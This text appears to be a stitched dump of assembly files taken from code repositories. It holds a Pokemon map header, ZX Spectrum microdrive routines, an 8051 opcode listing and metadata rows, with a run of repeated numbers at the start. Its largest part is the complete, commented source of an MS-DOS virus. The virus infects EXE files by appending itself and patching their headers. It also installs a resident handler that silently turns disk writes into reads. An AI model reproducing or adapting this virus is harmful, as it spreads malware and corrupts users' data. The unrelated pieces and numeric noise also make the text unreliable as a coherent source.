35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35
*/
| 31.969582 | 2,999 | 0.658183 |
ef7905b02466fa64900f0fa2637b7237ebd94cee | 266 | asm | Assembly | data/mapHeaders/viridianforest.asm | adhi-thirumala/EvoYellow | 6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c | [
"Unlicense"
] | 16 | 2018-08-28T21:47:01.000Z | 2022-02-20T20:29:59.000Z | data/mapHeaders/viridianforest.asm | adhi-thirumala/EvoYellow | 6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c | [
"Unlicense"
] | 5 | 2019-04-03T19:53:11.000Z | 2022-03-11T22:49:34.000Z | data/mapHeaders/viridianforest.asm | adhi-thirumala/EvoYellow | 6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c | [
"Unlicense"
] | 2 | 2019-12-09T19:46:02.000Z | 2020-12-05T21:36:30.000Z | ViridianForest_h:
db FOREST ; tileset
db VIRIDIAN_FOREST_HEIGHT, VIRIDIAN_FOREST_WIDTH ; dimensions (y, x)
dw ViridianForestBlocks, ViridianForestTextPointers, ViridianForestScript ; blocks, texts, scripts
db $00 ; connections
dw ViridianForestObject ; objects
| 38 | 99 | 0.819549 |
c5a7e6a9644ac31120c47080a70fdc65629751af | 1,432 | asm | Assembly | libsrc/spectrum/if1_init_file.asm | dex4er/deb-z88dk | 9ee4f23444fa6f6043462332a1bff7ae20a8504b | [
"ClArtistic"
] | 1 | 2018-09-04T23:07:24.000Z | 2018-09-04T23:07:24.000Z | libsrc/spectrum/if1_init_file.asm | dex4er/deb-z88dk | 9ee4f23444fa6f6043462332a1bff7ae20a8504b | [
"ClArtistic"
] | null | null | null | libsrc/spectrum/if1_init_file.asm | dex4er/deb-z88dk | 9ee4f23444fa6f6043462332a1bff7ae20a8504b | [
"ClArtistic"
] | null | null | null | ;
; ZX IF1 & Microdrive functions
;
; int if1_init_file (int drive, int name, struct M_CHAN buffer);
;
; This is the original BASIC structure with no added values/flags.
;
;
; Open a file for writing
;
; $Id: if1_init_file.asm,v 1.1 2006/05/23 21:47:25 stefano Exp $
;
XLIB if1_init_file
LIB if1_setname
filename: defs 10
if1_init_file:
rst 8
defb 31h ; Create Interface 1 system vars if required
pop af
pop hl ;buffer
pop de ;filename
pop bc ;driveno
push bc
push de
push hl
push af
push hl
ld a,c
ld ($5cd6),a
push de
ld hl,filename ; filename location
push hl
call if1_setname
ld ($5cda),hl ; length
pop hl
ld ($5cdc),hl ; pointer to filename
pop de
;rst 8 ; Erase if file exists ?
;defb 24h
rst 8
defb 22h ; Open temporary 'M' channel (touch)
; Now IX points to the newly created channel
push ix
pop hl
;ld a,h
;or l
;and a
;ld de,4 ; Experimentally corrected
;add hl,de ; with this offset
pop de ; buffer
ld bc,253h
;ld bc,37h
ldir ; take a copy of the file buffer header
xor a
rst 8
defb 21h ; stop microdrive motor
rst 8
defb 2Ch ; Reclaim the channel
; ..I need the initialized buffer only
; here we could check for free space
; and eventually give the "microdrive full" error
ld hl,0
ret
| 17.253012 | 67 | 0.613128 |
41d572e67e89bf5cfe7967b2a29cc58d21e53974 | 28,719 | asm | Assembly | MSDOS/Virus.MSDOS.Unknown.vcomm.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:13.000Z | 2022-03-16T09:11:05.000Z | MSDOS/Virus.MSDOS.Unknown.vcomm.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | null | null | null | MSDOS/Virus.MSDOS.Unknown.vcomm.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:15.000Z | 2022-01-08T20:51:04.000Z | ;--------------------------------------------------------------------;
; ;
; EXE virus, with resident part ;
; ;
; ---- infecting program ---- ;
; ;
;--------------------------------------------------------------------;
;--------------------------------------------------------------------;
; ;
; WARNING : it's definitely NOT safe to assemble and execute ;
; this code. If anybody has to, I highly reccomend using ;
; a diskette and debugger. ;
; ;
;--------------------------------------------------------------------;
;*********************************************************************
;--------------------------------------------------------------------;
; ;
; The EXE virus concept is as follows: ;
; ;
; First, original Disk Transfer Address is preserved to avoid ;
; changing command-line text. Also initial values of CS, IP, SS, SP ;
; DS and ES are saved (to be restored on exit from virus code). ;
; Virus is to be appended to original code and, of course, has ;
; to be relocated before it's executed. Thus, first we look for ;
; an EXE file. Then we have to know if this is in fact an EXE ;
; (checking for magic 'MZ' signature) and if there is any free space ;
; in relocation table. This is checked by substracting relocation ;
; table end (i.e. sum of table start and number of relocation items, ;
; multiplied by table entry size) from EXE header size. ;
; Smart virus shouldn't infect a file that's already infected. ;
; So first 4 bytes of code to be executed is compared against ;
; virus code. If they match one another, no infection takes place. ;
; Having found suitable file, we compute its code end and append ;
; virus at the end of code, writing alignment to last 512-bytes page ;
; boundary if necessary. Original start address is preserved inside ;
; virus, and CS:IP value in EXE header gets changed, so that virus ;
; code would be executed first. Number of pages gets changed, ;
; together with Last Page Size and Number Of Relocation Items. ;
; New relocation item address is appended to relocation table, ;
; pointing to the segment of the far jump in virus (this is the jump ;
; virus uses to return to original code). ;
; Upon returning from virus, all saved registers and DTA are ;
; restored to reestablish environment state as if no virus existed. ;
; ;
; Virus also installs resident part, if it is not already present. ;
; This part's job is to replace all disk 'writes' with corresponding ;
; 'reads'. It's rather unharmful, but can easily be replaced with ;
; more dangerous one (if somebody is really keen to be called ...). ;
; Instalation can be removed with equal ease, as well. ;
; ;
; The real trouble with EXEs is that DOS pays a little (if any) ;
; attention to Last Page Size. Therefore EXE files ofen have this ;
; zeroed, even if they have some code on the last page. Writing to ;
; last page can cause system crash while infected file is being ;
; executed. To solve the problem, one should first test if EXE file ;
; really ends as the header contents say and move to last page end ;
; instead of appending any bytes, if possible. ;
; ;
; Another problem is infecting EXEs containg debug info. ;
; It comes in various formats, and often contains vital informations ;
; placed behind code. This info gets destroyed when file becomes ;
; infected. I see no solution to this problem, so far. ;
; ;
;--------------------------------------------------------------------;
;********************************************************************;
;--------------------------------------------------------------------;
; ;
; SEGMENT dummy ;
; ;
; Raison d'etre of this segment is to force assembling of ;
; the JMP FAR after the execution of virus code. ;
; ;
; This segment serves also to make it possible for the infecting ;
; program to return to DOS. ;
; ;
;--------------------------------------------------------------------;
dummy segment 'dummy'
assume cs: dummy
d_end label far ; this is the point virus jumps to
; after executing itself
mov ah, 4Ch
int 21h ; DOS EXIT function
dummy ends
;--------------------------------------------------------------------;
; ;
; SEGMENT code ;
; ;
; Code for virus (including its resident part). ;
; ;
; Executed from label start:. Exits via dummy:d_end. ;
; ;
;--------------------------------------------------------------------;
code segment 'code'
public start, jump, old_IP, old_CS, old_DTA,
public next, ok, exit, header, DTA, file_name, old_SS, old_SP, aux
public last_page, page_count, item_count, header_size, table_start
public header_IP, header_CS, header_SS, header_SP, aux_CS, aux_IP
public not_ok, time, date, attributes, new_name, found_name
public restore_and_close, dot, seek_dot, next_letter, install_flag
public next_lttr, EXE_sign, int_CS, int_IP, virus_length, set_ES
public resident, resident_size, l1, call_int, install, set_DS
assume cs : code, ds : code
;--------------------------------------------------------------------;
; ;
; Here are symbolic names for memory locations ;
; ;
;--------------------------------------------------------------------;
; First go names for EXE header contents
EXE_sign equ word ptr [header]
last_page equ word ptr [header + 2]
page_count equ word ptr [header + 4]
item_count equ word ptr [header + 6]
header_size equ word ptr [header + 8]
header_SS equ word ptr [header + 0Eh]
header_SP equ word ptr [header + 10h]
header_IP equ word ptr [header + 14h]
header_CS equ word ptr [header + 16h]
table_start equ word ptr [header + 18h]
; Now names for address of mother program
old_IP equ word ptr [jump + 1]
old_CS equ word ptr [jump + 3]
; Segment to put resident part in, for instance end of 2nd Hercules page
resident_CS equ 0BFFEh
; And label for the name of the file found by Find_First and Find_Next
found_name equ DTA + 1Eh
; Last is virus length
virus_length equ offset header
;------------ Now starts virus code --------------------------------;
; First original values of SS, SP, ES, DS are preserved,
; and new values for this registers are set
start: mov cx, ss ; temporarily save SS in CX
mov dx, sp ; and SP in DX
mov ax, cs ; now AX = CODE
cli ; disable hard ints while changing stack
mov ss, ax ; now SS = CODE
mov sp, 0FFFFh ; and SS points to segment end
sti ; hardware interrupts are OK now
push ds ; preserve DS on stack
push es ; same with ES
push cs
pop ds ; set DS to CODE
mov [old_SS], cx ; now as DS is CODE, we can store
mov [old_SP], dx ; original SS and SP in memory
; Original DTA is preserved now
mov ah, 2Fh
int 21h
mov word ptr [old_DTA], bx ; now ES:BX points to DTA
mov word ptr [old_DTA + 2], es ; save its address in memory
; Call to Get_DTA would have destroyed ES. Now set it
push ds ; set ES to CODE
pop es
; And now new DTA is established for virus disk actions
mov dx, offset DTA ; DS:DX point to new DTA
mov ah, 1Ah
int 21h
; Store original INT_13 vector for use in resident part
mov ax, 3513h
int 21h ; DOS Get_Interrupt_Vector function
mov [int_IP], bx ; now ES:BX holds INT_13 vector
mov [int_CS], es ; store it inside resident part
; Check if resident part already present
mov ax, es ; compare can work with AX
cmp ax, resident_CS ; check if this is resident_CS
jnz install ; no, so install
cmp bx, 0 ; is offset 0 ?
jnz install ; no, so install
; Resident part found, do not install
mov [install_flag], 0 ; signal 'no installing'
jmp short set_ES ; and omit copying code
; Now resident part is moved to its place in memory
install: mov ax, resident_CS
mov es, ax ; ES = segment for resident part
xor di, di ; DI = 0, resident starts from offset 0
mov si, offset resident ; SI = offset in DS for resident part
mov cx, resident_size ; CX = size of resident part
cld ; set auto increment
rep movsb ; copy resident part from DS:SI to ES:DI
mov [install_flag], 1 ; signal 'instal vector'
; Reestablish destroyed ES to CODE
set_ES: push ds
pop es
; Now decode "*.EXE" name pattern. It's coded to disable 'eye-shot' discovery
mov si, offset file_name ; name pattern starts there
mov cx, 5 ; and is 5 bytes long
next_letter: inc byte ptr [si] ; decode by incrementing by one
inc si
loop next_letter ; decode all 5 bytes
; Find an EXE file
mov dx, offset file_name ; DS:DX points to '*.EXE'
mov cx, 20h ; search for read-only files too
mov ah, 4Eh ; DOS Find_First function
int 21h ; now DTA gets filled with info
jnc check ; no carry means file found
; jump to check if to infect file
jmp exit ; no EXE file - nothing to do
; Find next EXE file, if necessary
next: mov ah, 4Fh ;DOS Find_Next function
int 21h
jnc check ; see jumps after Find_First
jmp exit ; for explanation
; Check if file should and can be infected
; First of all, get file attributes
check: mov dx, offset found_name ; DS:DX points to found file name
mov ax, 4300h ; DOS Get_File_Attributes function
int 21h ; attributes returned in CX
mov [attributes], cx ; preserve them in memory
; Then change file attributes to 'neutral'
mov dx, offset found_name ; DS:DX points to found file name
xor cx, cx ; CX = 0 - means no attributes set
mov ax, 4301h ; DOS Set_File_Attributes function
int 21h ; attributes to be set in CX
; To avoid being spotted by VIRBLK, rename ????????.EXE to ???????.
mov si, offset found_name ; DS:DX points to found file name
mov di, offset new_name ; ES:DI points to new name
cld ; set auto increment
; Copy old name to new name until dot found
seek_dot: lodsb ; get character at DS:SI
cmp al, '.' ; check if it is a dot
stosb ; copy it anyway to ES:DI
jz dot ; dot found, end of copying
loop seek_dot ; if no dot, copy next character
; DOS requires ASCIIZ strings, so append a byte of 0 to new name
dot: xor al, al ; AL = 0
stosb ; store 0 to byte at ES:DI
; Now rename can be performed
mov dx, offset found_name ; DS:DX points to old name
mov di, offset new_name ; ES:DI points to new name
mov ah, 56h ; DOS Rename_File function
int 21h
; It is safe to open file now
mov dx, offset new_name ; DS:DX points to file name
mov ax, 3D02h ; DOS Open_File_Handle fuction
int 21h ; open file for reading and writing
jc next ; carry set means for some reason
; operation failed
; try to find next file
; Preserve handle for just open file in BX register
mov bx, ax ; all DOS calls require handle in BX
; Now store original file time and date, to be restored on closing the file
mov ax, 5700h ; DOS Get_File_Time_Date function
int 21h ; time returned in CX, date in DX
mov [time], cx ; store time in memory
mov [date], dx ; same with date
; Read EXE header to memory
mov dx, offset header ; DS:DX = place to read header to
mov cx, 1Ah ; header is 1Ah bytes long
mov ah, 3Fh ; DOS Read_Handle function
int 21h
; Check if it is a real EXE, not just EXE-named file
check_EXE: cmp EXE_sign, 5A4Dh ; first two bytes of header should
; contain 'MZ' characters
jne not_ok ; if not, don't proceed with file
; It is EXE, check if it is already infected
; by comparing code start with itself
; Compute where code in file starts
mov ax, [header_CS] ; get start CS for file
add ax, [header_size] ; add header size
mov cx, 16 ; above were in 16 bytes units
mul cx ; so multiply by 16
; DX|AX holds result
add ax, [header_IP] ; add for IP
adc dx, 0 ; propagate carry if necessasry
; Now DX|AX holds file offset for code start, move there
mov cx, dx ; set registers for DOS call
mov dx, ax
mov ax, 4200h ; DOS Move_File_Ptr function
int 21h ; move relatively to start
; Read first four bytes of code
mov dx, offset aux ; DS:DX = place to read code into
mov cx, 4 ; CX = number of bytes to read
mov ah, 3Fh ; DOS Read_Handle function
int 21h
; Compare them with itself
mov di, offset aux ; ES:DI points to code from file
mov si, offset start ; DS:SI points to itself start
mov cx, 2 ; CX = number of words to compare
cld ; set auto increment
repe cmpsw ; compare while equal
je not_ok ; equal = infected, don't proceed
; Check if there is space in relocation table to put one more item
; Calculate where Relocation_Table ends
mov ax, [item_count] ; get number of Relocation Items
inc ax ; add for new one
mov cx, 4 ; each one is 4 bytes long
mul cx ; so multiply by 4
; DX|AX holds result
add ax, [table_start] ; add offset of Relocation_Table
adc dx, 0 ; process carry
; Now DX|AX holds file offset for table end, store it temporarily in DI|SI
mov di, dx ; preserve Relocation_Table offset
mov si, ax
; Calculate where code starts (in file)
mov ax, [header_size] ; get header size for this EXE
mov cx, 10h ; as it is in 16 byte units,
mul cx ; multiply by 16
; DX|AX holds result
; See if there is free space for relocation item
sub ax, si ; substract Relocation_Table end
sbb dx, di
jae ok ; Relocation_Table end not less
; then code start, so there IS room
; If somehow this file is not to be infected, restore it's original state
not_ok: call restore_and_close
jmp next ; nevertheless, try to find infectable one
; File is to be infected now
; First adjust file offset for new relocation item
ok: sub si, 4 ; new item starts 4 bytes
sbb di, 0 ; before Relocation_Table end
; Then preserve temporarily address of the mother code
mov ax, [old_CS] ; preserve jump address via AX
mov [aux_CS], ax ; in memory
mov ax, [old_IP]
mov [aux_IP], ax
; Form inside itself a jump to new mother start
mov ax, [header_IP] ; store new mother CS:IP as jump
mov [old_IP], ax ; do it via AX
mov ax, [header_CS]
mov [old_CS], ax
; Calculate last page alignment
mov cx, [last_page] ; CX = number of bytes in last page
mov ax, 200h ; AX = page size (page is 512 bytes)
sub ax, cx ; CX = alignment to page boundary
mov bp, ax ; preserve alignment in BP
; Calculate new CS:IP values to execute virus instead of mother
mov ax, [page_count] ; get number of pages in new mother
mov cx, 20h ; multiply by 32 to convert to
mul cx ; 16 bytes units
sub ax, [header_size] ; decrease by header size
; Modify header as necessary
mov [header_CS], ax ; AX holds CS for virus
xor ax, ax ; now zero AX
mov [header_IP], ax ; as IP for virus is 0
add [page_count], 2 ; reserve space for virus
inc [item_count] ; there'll be one more item
mov [last_page], offset header ; last page will be as long
; as virus itself
and [last_page], 1FFh ; modulo 512, of course
; Move to file start
xor cx, cx ; start means offset 0
xor dx, dx
mov ax, 4200h ; DOS Move_File_Ptr function
int 21h ; move relatively to start
; Write new header
mov dx, offset header ; DS:DX points to new header
mov cx, 1Ah ; which is still 1A bytes long
mov ah, 40h ; DOS Write_Handle function
int 21h
; Move to new Relocation Item position
mov cx, di ; get stored position from DI|SI
mov dx, si
mov ax, 4200h ; DOS Move_File_Ptr function
int 21h ; move relatively to start
; Write new relocation item
mov [header_IP], offset old_CS ; new Relocation Item offset
; is jump to new mother code
mov dx, offset header_IP ; DS:DX = new relocation item
mov cx, 4 ; exactly 4 bytes long
mov ah, 40h ; DOS Write_Handle function
int 21h
; Calculate file offset for new mother code end
mov ax, [header_CS] ; get mother code lenght
add ax, [header_size] ; add header size
mov cx, 10h ; it's in 16 bytes units
mul cx ; so multiply by 16
sub ax, bp ; last page is not full
sbb dx, 0 ; so move back appropirately
; Move file ptr to mother code end
mov cx, dx ; DX|AX = file offset to code end
mov dx, ax ; set CX|DX for DOS call
mov ax, 4200h ; DOS Move_File_Ptr function
int 21h ; move relatively to start
; Write alignement (no matter what, only number is important)
mov cx, bp ; get alignement amount
mov ah, 40h ; DOS Write_Handle function
int 21h ; write CX bytes
; Now prepare to append itself to EXE file
; First encode EXE name patter anew
mov si, offset file_name ; DS:SI points to name pattern
mov cx, 5 ; it is 5 characters long
next_lttr: dec byte ptr [si] ; encode by decrement
inc si
loop next_lttr ; encode all 5 characters
; All ready, append itself now
xor dx, dx ; DX = 0, start offset for virus code
mov cx, virus_length ; CX = number of bytes to write
mov ah, 40h ; DOS Write_Handle function
int 21h
; No further action involving file will be taken, so restore it's state
call restore_and_close ; restore date and time, close file
; Restore jump to this mother code
mov ax, [aux_CS] ; restore jump addres via AX
mov [old_CS], ax
mov ax, [aux_IP]
mov [old_IP], ax
; All done with infecting, prepare to execute mother
; Restore original DTA
push ds ; preserve DS (now DS = CODE)
exit: lds dx, old_DTA ; get original DTA address to DS:DX
mov ah, 1Ah ; DOS Set_DTA function
int 21h
; Check if install new INT_13 vector
cmp [install_flag], 0 ; 0 means no installing
jz set_DS ; omit installing
; Install resident part
mov ax, resident_CS ; load CS for resident to DS (via AX)
mov ds, ax
xor dx, dx ; DS:DX = address of resident part
mov ax, 2513h ; DOS Set_Interrupt_Vector function
int 21h ; set vector for INT_13
set_DS: pop ds ; restore DS to CODE
mov bx, [old_SS] ; BX = original SS
mov cx, [old_SP] ; CX = original SP
pop es ; restore original DS and ES
pop ds
cli ; disable hardware interrupts
mov sp, cx ; while restoring original SS:SP
mov ss, bx
sti ; enable hardware interrupts
; Virus has done all its job, now let mother do its own
jump: jmp dummy:d_end ; jump to original code
;----------- here is the one and only procedure -------------------;
restore_and_close proc near
; Restore original file time and date
mov cx, [time] ; get saved time
mov dx, [date] ; get saved date
mov ax, 5701h ; DOS Set_File_Time_Date function
int 21h ; time set as CX, date as DX
; Close file
mov ah, 3Eh ; DOS Close_File function
int 21h
; Restore original name
mov dx, offset new_name ; DS:DX points to new name
mov di, offset found_name ; ES:DI points to original name
mov ah, 56h ; DOS Rename_File function
int 21h
; Restore original file attributes
mov dx, offset found_name ; restore attributes
mov cx, [attributes]
mov ax, 4301h ; DOS Set_File_Attributes function
int 21h ; attributes set as CX
ret
restore_and_close endp
;------------ and here go the resident part of the virus -------------;
resident: pushf ; save flags
cmp ah, 3 ; is it Disk_Write_1 ?
jnz l1 ; no, check Disk_Write_2
mov ah, 2 ; yes, convert to Disk_Read_1
jmp short call_int ; and exit resident
l1: cmp ah, 0Bh ; is it Disk_Write_2 ?
jnz call_int ; no, exit resident
mov ah, 0Ah ; yes, convert to Disk_Read_2
call_int: popf ; restore flags
; Next 5 bytes form long jump to original INT_13 handler
db 0EAh ; means JMP FAR
int_IP dw 0 ; and here the address to jump to
int_CS dw 0
resident_size equ $ - resident
;-------- now data for virus, just encoded file name pattern -------;
file_name db ')-DWD', 0
;-------------------------------------------------------------------;
; ;
; Here VIRUS ends. The rest are purely placeholders ;
; ;
;-------------------------------------------------------------------;
;*******************************************************************;
header dw 13 dup (0)
old_SS dw 0
old_SP dw 0
aux_CS dw 0
aux_IP dw 0
old_DTA dd 0
time dw 0
date dw 0
attributes dw 0
install_flag db 0
new_name db 9 dup (0)
DTA dw 2Ch dup (0)
aux dw 2 dup (0)
code ends
end start
| 39.667127 | 81 | 0.453846 |
79123d8f4d285e90bc6f8eca5f22583f3c74eec9 | 8,099 | asm | Assembly | tools/asmx2/test/8051.asm | retro16/blastsdk | 572bd8489e6a2c1cc638120aa62241c99badc2e5 | [
"MIT"
] | 10 | 2017-01-14T16:22:58.000Z | 2021-02-16T21:41:48.000Z | tools/asmx2/test/8051.asm | retro16/blastsdk | 572bd8489e6a2c1cc638120aa62241c99badc2e5 | [
"MIT"
] | 3 | 2016-09-15T21:45:34.000Z | 2016-09-17T08:06:06.000Z | tools/asmx2/test/8051.asm | retro16/blastsdk | 572bd8489e6a2c1cc638120aa62241c99badc2e5 | [
"MIT"
] | 2 | 2016-09-15T22:09:38.000Z | 2018-05-21T15:26:30.000Z | ; 8051.ASM
dir equ 'D'
imm equ 'I'
bit equ 0x28
b equ 0x02
ad16 equ $1234
NOP ; 00
AJMP $0001 ; 01 xx
LJMP ad16 ; 02 xxxx
RR A ; 03
INC A ; 04
INC dir ; 05 dir
INC @R0 ; 06
INC @R1 ; 07
INC R0 ; 08
INC R1 ; 09
INC R2 ; 0A
INC R3 ; 0B
INC R4 ; 0C
INC R5 ; 0D
INC R6 ; 0E
INC R7 ; 0F
JBC bit.b,. ; 10 bit rel
ACALL $0011 ; 11 xx
LCALL ad16 ; 12 xxxx
RRC A ; 13
DEC A ; 14
DEC dir ; 15 dir
DEC @R0 ; 16
DEC @R1 ; 17
DEC R0 ; 18
DEC R1 ; 19
DEC R2 ; 1A
DEC R3 ; 1B
DEC R4 ; 1C
DEC R5 ; 1D
DEC R6 ; 1E
DEC R7 ; 1F
JB bit.b,. ; 20 bit rel
AJMP $0121 ; 21 xx
RET ; 22
RL A ; 23
ADD A,#imm ; 24 imm
ADD A,dir ; 25 dir
ADD A,@R0 ; 26
ADD A,@R1 ; 27
ADD A,R0 ; 28
ADD A,R1 ; 29
ADD A,R2 ; 2A
ADD A,R3 ; 2B
ADD A,R4 ; 2C
ADD A,R5 ; 2D
ADD A,R6 ; 2E
ADD A,R7 ; 2F
JNB bit.b,. ; 30 bit rel
ACALL $0131 ; 31 xx
RETI ; 32
RLC A ; 33
ADDC A,#imm ; 34 imm
ADDC A,dir ; 35 dir
ADDC A,@R0 ; 36
ADDC A,@R1 ; 37
ADDC A,R0 ; 38
ADDC A,R1 ; 39
ADDC A,R2 ; 3A
ADDC A,R3 ; 3B
ADDC A,R4 ; 3C
ADDC A,R5 ; 3D
ADDC A,R6 ; 3E
ADDC A,R7 ; 3F
JC . ; 40 rel
AJMP $0241 ; 41 xx
ORL dir,A ; 42 dir
ORL dir,#imm; 43 dir imm
ORL A,#imm ; 44 imm
ORL A,dir ; 45 dir
ORL A,@R0 ; 46
ORL A,@R1 ; 47
ORL A,R0 ; 48
ORL A,R1 ; 49
ORL A,R2 ; 4A
ORL A,R3 ; 4B
ORL A,R4 ; 4C
ORL A,R5 ; 4D
ORL A,R6 ; 4E
ORL A,R7 ; 4F
JNC . ; 50 rel
ACALL $0251 ; 51 xx
ANL dir,A ; 52 dir
ANL dir,#imm; 53 dir imm
ANL A,#imm ; 54 imm
ANL A,dir ; 55 dir
ANL A,@R0 ; 56
ANL A,@R1 ; 57
ANL A,R0 ; 58
ANL A,R1 ; 59
ANL A,R2 ; 5A
ANL A,R3 ; 5B
ANL A,R4 ; 5C
ANL A,R5 ; 5D
ANL A,R6 ; 5E
ANL A,R7 ; 5F
JZ . ; 60 rel
AJMP $0361 ; 61 xx
XRL dir,A ; 62 dir
XRL dir,#imm; 63 dir imm
XRL A,#imm ; 64 imm
XRL A,dir ; 65 dir
XRL A,@R0 ; 66
XRL A,@R1 ; 67
XRL A,R0 ; 68
XRL A,R1 ; 69
XRL A,R2 ; 6A
XRL A,R3 ; 6B
XRL A,R4 ; 6C
XRL A,R5 ; 6D
XRL A,R6 ; 6E
XRL A,R7 ; 6F
JNZ . ; 70 rel
ACALL $0371 ; 71 xx
ORL C,bit.b ; 72 bit
JMP @A+DPTR ; 73
MOV A,#imm ; 74 imm
MOV dir,#imm; 75 dir imm
MOV @R0,#imm; 76 imm
MOV @R1,#imm; 77 imm
MOV R0,#imm ; 78 imm
MOV R1,#imm ; 79 imm
MOV R2,#imm ; 7A imm
MOV R3,#imm ; 7B imm
MOV R4,#imm ; 7C imm
MOV R5,#imm ; 7D imm
MOV R6,#imm ; 7E imm
MOV R7,#imm ; 7F imm
SJMP . ; 80 rel
AJMP $0481 ; 81 xx
ANL C,bit.b ; 82 bit
MOVC A,@A+PC ; 83
DIV AB ; 84
MOV dir,dir+1 ; 85 src dst
MOV dir,@R0 ; 86 dir
MOV dir,@R1 ; 87 dir
MOV dir,R0 ; 88 dir
MOV dir,R1 ; 89 dir
MOV dir,R2 ; 8A dir
MOV dir,R3 ; 8B dir
MOV dir,R4 ; 8C dir
MOV dir,R5 ; 8D dir
MOV dir,R6 ; 8E dir
MOV dir,R7 ; 8F dir
MOV DPTR,#ad16 ; 90 xxxx
ACALL $0491 ; 91 xx
MOV bit.b,C ; 92 bit
MOVC A,@A+DPTR ; 93
SUBB A,#imm ; 94 imm
SUBB A,dir ; 95 dir
SUBB A,@R0 ; 96
SUBB A,@R1 ; 97
SUBB A,R0 ; 98
SUBB A,R1 ; 99
SUBB A,R2 ; 9A
SUBB A,R3 ; 9B
SUBB A,R4 ; 9C
SUBB A,R5 ; 9D
SUBB A,R6 ; 9E
SUBB A,R7 ; 9F
ORL C,/bit.b ; A0 bit
AJMP $05A1 ; A1 xx
MOV C,bit.b ; A2 bit
INC DPTR ; A3
MUL AB ; A4
DB A5H
MOV @R0,dir ; A6 dir
MOV @R1,dir ; A7 dir
MOV R0,dir ; A8 dir
MOV R1,dir ; A9 dir
MOV R2,dir ; AA dir
MOV R3,dir ; AB dir
MOV R4,dir ; AC dir
MOV R5,dir ; AD dir
MOV R6,dir ; AE dir
MOV R7,dir ; AF dir
ANL C,/bit.b ; B0 bit
ACALL $05B1 ; B1 xx
CPL bit.b ; B2 bit
CPL C ; B3
CJNE A,#imm,.; B4 imm rel
CJNE dir,. ; B5 dir rel
CJNE @R0,#imm,.; B6 imm rel
CJNE @R1,#imm,.; B7 imm rel
CJNE R0,#imm,.; B8 imm rel
CJNE R1,#imm,.; B9 imm rel
CJNE R2,#imm,.; BA imm rel
CJNE R3,#imm,.; BB imm rel
CJNE R4,#imm,.; BC imm rel
CJNE R5,#imm,.; BD imm rel
CJNE R6,#imm,.; BE imm rel
CJNE R7,#imm,.; BF imm rel
PUSH dir ; C0 dir
AJMP $06C1 ; C1 xx
CLR bit.b ; C2 bit
CLR C ; C3
SWAP A ; C4
XCH A,dir ; C5 dir
XCH A,@R0 ; C6
XCH A,@R1 ; C7
XCH A,R0 ; C8
XCH A,R1 ; C9
XCH A,R2 ; CA
XCH A,R3 ; CB
XCH A,R4 ; CC
XCH A,R5 ; CD
XCH A,R6 ; CE
XCH A,R7 ; CF
POP dir ; D0 dir
ACALL $06D1 ; D1 xx
SETB bit.b ; D2 bit
SETB C ; D3
DA A ; D4
DJNZ dir,. ; D5 dir rel
XCHD A,@R0 ; D6
XCHD A,@R1 ; D7
DJNZ R0,. ; D8 rel
DJNZ R1,. ; D9 rel
DJNZ R2,. ; DA rel
DJNZ R3,. ; DB rel
DJNZ R4,. ; DC rel
DJNZ R5,. ; DD rel
DJNZ R6,. ; DE rel
DJNZ R7,. ; DF rel
MOVX A,@DPTR ; E0
AJMP $07E1 ; E1 xx
MOVX A,@R0 ; E2
MOVX A,@R1 ; E3
CLR A ; E4
MOV A,dir ; E5 dir
MOV A,@R0 ; E6
MOV A,@R1 ; E7
MOV A,R0 ; E8
MOV A,R1 ; E9
MOV A,R2 ; EA
MOV A,R3 ; EB
MOV A,R4 ; EC
MOV A,R5 ; ED
MOV A,R6 ; EE
MOV A,R7 ; EF
MOVX @DPTR,A ; F0
ACALL $07F1 ; F1 xx
MOVX @R0,A ; F2
MOVX @R1,A ; F3
CPL A ; F4
MOV dir,A ; F5 dir
MOV @R0,A ; F6
MOV @R1,A ; F7
MOV R0,A ; F8
MOV R1,A ; F9
MOV R2,A ; FA
MOV R3,A ; FB
MOV R4,A ; FC
MOV R5,A ; FD
MOV R6,A ; FE
MOV R7,A ; FF
| 28.925 | 38 | 0.328436 |
153e7702cf378610d4d902af0923cb9e23e52bf2 | 431 | asm | Assembly | programs/oeis/165/A165478.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
